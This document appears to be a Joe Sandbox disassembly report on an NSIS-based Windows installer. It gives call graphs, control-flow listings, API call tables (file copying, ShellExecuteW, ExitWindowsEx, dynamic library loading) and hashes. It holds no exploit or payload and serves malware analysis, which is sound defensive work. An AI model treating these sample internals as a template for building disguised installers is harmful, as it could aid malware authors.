lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4115 401a1f 4116 40145c 18 API calls 4115->4116 4117 401a26 4116->4117 4118 4062a3 11 API calls 4117->4118 4119 401a49 4118->4119 4120 401a64 4119->4120 4121 401a5c 4119->4121 4169 406009 lstrcpynW 4120->4169 4168 406009 lstrcpynW 4121->4168 4124 401a62 4128 406038 5 API calls 4124->4128 4125 401a6f 4126 406722 3 API calls 4125->4126 4127 401a75 lstrcatW 4126->4127 4127->4124 4130 401a81 4128->4130 4129 4062d5 2 API calls 4129->4130 4130->4129 4131 405e30 2 API calls 4130->4131 4133 401a98 CompareFileTime 4130->4133 4134 401ba9 4130->4134 4138 4062a3 11 API calls 4130->4138 4142 406009 lstrcpynW 4130->4142 4148 406805 18 API calls 4130->4148 4155 405ca0 MessageBoxIndirectW 4130->4155 4159 401b50 4130->4159 4166 401b5d 4130->4166 4167 405e50 GetFileAttributesW CreateFileW 4130->4167 4131->4130 4133->4130 4135 404f72 25 API calls 4134->4135 4137 401bb3 4135->4137 4136 404f72 25 API calls 4139 401b70 4136->4139 4140 40337f 37 API calls 4137->4140 4138->4130 4143 4062a3 11 API calls 4139->4143 4141 401bc6 4140->4141 4144 4062a3 11 API calls 4141->4144 4142->4130 4150 401b8b 4143->4150 4145 401bda 4144->4145 4146 401be9 SetFileTime 4145->4146 4147 401bf8 CloseHandle 4145->4147 4146->4147 4149 401c09 4147->4149 4147->4150 4148->4130 4151 401c21 4149->4151 4152 401c0e 4149->4152 4154 406805 18 API calls 4151->4154 4153 406805 18 API calls 4152->4153 4156 401c16 lstrcatW 4153->4156 4157 401c29 4154->4157 4155->4130 4156->4157 4158 4062a3 11 API calls 4157->4158 4160 401c34 4158->4160 4161 401b93 4159->4161 4162 401b53 4159->4162 4163 405ca0 MessageBoxIndirectW 4160->4163 4164 4062a3 11 API calls 4161->4164 4165 4062a3 11 API calls 4162->4165 4163->4150 4164->4150 4165->4166 4166->4136 4167->4130 4168->4124 4169->4125 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4061 4021b5 4062 40145c 18 API calls 4061->4062 4063 4021bb 4062->4063 4064 40145c 18 API calls 4063->4064 4065 4021c4 4064->4065 4066 40145c 18 API calls 4065->4066 4067 4021cd 4066->4067 4068 40145c 18 API calls 4067->4068 4069 4021d6 4068->4069 4070 404f72 25 API calls 4069->4070 4071 4021e2 ShellExecuteW 4070->4071 4072 40221b 4071->4072 4073 40220d 4071->4073 4075 4062a3 11 API calls 4072->4075 4074 4062a3 11 API calls 4073->4074 4074->4072 4076 402230 4075->4076 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4077 401eb9 4078 401f24 4077->4078 4079 401ec6 4077->4079 4080 401f53 GlobalAlloc 4078->4080 4081 401f28 4078->4081 4082 401ed5 4079->4082 4089 401ef7 4079->4089 4083 406805 18 API calls 4080->4083 4088 4062a3 11 API calls 4081->4088 4093 401f36 4081->4093 4084 4062a3 11 API calls 4082->4084 4087 401f46 4083->4087 4085 401ee2 4084->4085 4090 402708 4085->4090 4095 406805 18 API calls 4085->4095 4087->4090 4091 402387 GlobalFree 4087->4091 4088->4093 4099 406009 lstrcpynW 4089->4099 4091->4090 4101 406009 lstrcpynW 4093->4101 4094 401f06 4100 406009 lstrcpynW 4094->4100 4095->4085 4097 401f15 4102 406009 lstrcpynW 4097->4102 4099->4094 4100->4097 4101->4087 4102->4090 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 CoUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                  APIs
                                  • #17.COMCTL32 ref: 004038A2
                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                  • CoUninitialize.COMBASE(?), ref: 00403AD1
                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                  • API String ID: 2435955865-239407132
                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 625 4074bb-4074c0 626 4074c2-4074ef 625->626 627 40752f-407547 625->627 629 4074f1-4074f4 626->629 630 4074f6-4074fa 626->630 628 407aeb-407aff 627->628 634 407b01-407b17 628->634 635 407b19-407b2c 628->635 631 407506-407509 629->631 632 407502 630->632 633 4074fc-407500 630->633 636 407527-40752a 631->636 637 40750b-407514 631->637 632->631 633->631 638 407b33-407b3a 634->638 635->638 641 4076f6-407713 636->641 642 407516 637->642 643 407519-407525 637->643 639 407b61-407c68 638->639 640 407b3c-407b40 638->640 656 407350 639->656 657 407cec 639->657 645 407b46-407b5e 640->645 646 407ccd-407cd4 640->646 648 407715-407729 641->648 649 40772b-40773e 641->649 642->643 644 407589-4075b6 643->644 652 4075d2-4075ec 644->652 653 4075b8-4075d0 644->653 645->639 650 407cdd-407cea 646->650 654 407741-40774b 648->654 649->654 655 407cef-407cf6 650->655 658 4075f0-4075fa 652->658 653->658 659 40774d 654->659 660 4076ee-4076f4 654->660 661 407357-40735b 656->661 662 40749b-4074b6 656->662 663 40746d-407471 656->663 664 4073ff-407403 656->664 657->655 667 407600 658->667 668 407571-407577 658->668 669 407845-4078a1 659->669 670 4076c9-4076cd 659->670 660->641 666 407692-40769c 660->666 661->650 671 407361-40736e 661->671 662->628 676 407c76-407c7d 663->676 677 407477-40748b 663->677 682 407409-407420 664->682 683 407c6d-407c74 664->683 672 4076a2-4076c4 666->672 673 407c9a-407ca1 666->673 685 407556-40756e 667->685 686 407c7f-407c86 667->686 674 40762a-407630 668->674 675 40757d-407583 668->675 669->628 678 407c91-407c98 670->678 679 4076d3-4076eb 670->679 671->657 687 407374-4073ba 671->687 672->669 673->650 688 40768e 674->688 689 407632-40764f 674->689 675->644 675->688 676->650 684 40748e-407496 677->684 678->650 679->660 690 407423-407427 682->690 683->650 684->663 694 407498 684->694 685->668 686->650 692 4073e2-4073e4 687->692 693 4073bc-4073c0 687->693 688->666 695 407651-407665 689->695 696 407667-40767a 689->696 690->664 691 407429-40742f 690->691 698 407431-407438 691->698 699 407459-40746b 691->699 702 4073f5-4073fd 692->702 703 4073e6-4073f3 692->703 700 4073c2-4073c5 GlobalFree 693->700 701 4073cb-4073d9 GlobalAlloc 693->701 694->662 697 40767d-407687 695->697 696->697 697->674 704 407689 697->704 705 407443-407453 GlobalAlloc 698->705 706 40743a-40743d GlobalFree 698->706 699->684 700->701 701->657 707 4073df 701->707 702->690 703->702 703->703 709 407c88-407c8f 704->709 710 40760f-407627 704->710 705->657 705->699 706->705 707->692 709->650 710->674
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: AddressHandleLibraryLoadModuleProc
                                  • String ID:
                                  • API String ID: 310444273-0
                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                  APIs
                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                  APIs
                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                  • ShowWindow.USER32(?), ref: 00401753
                                  • ShowWindow.USER32(?), ref: 00401767
                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
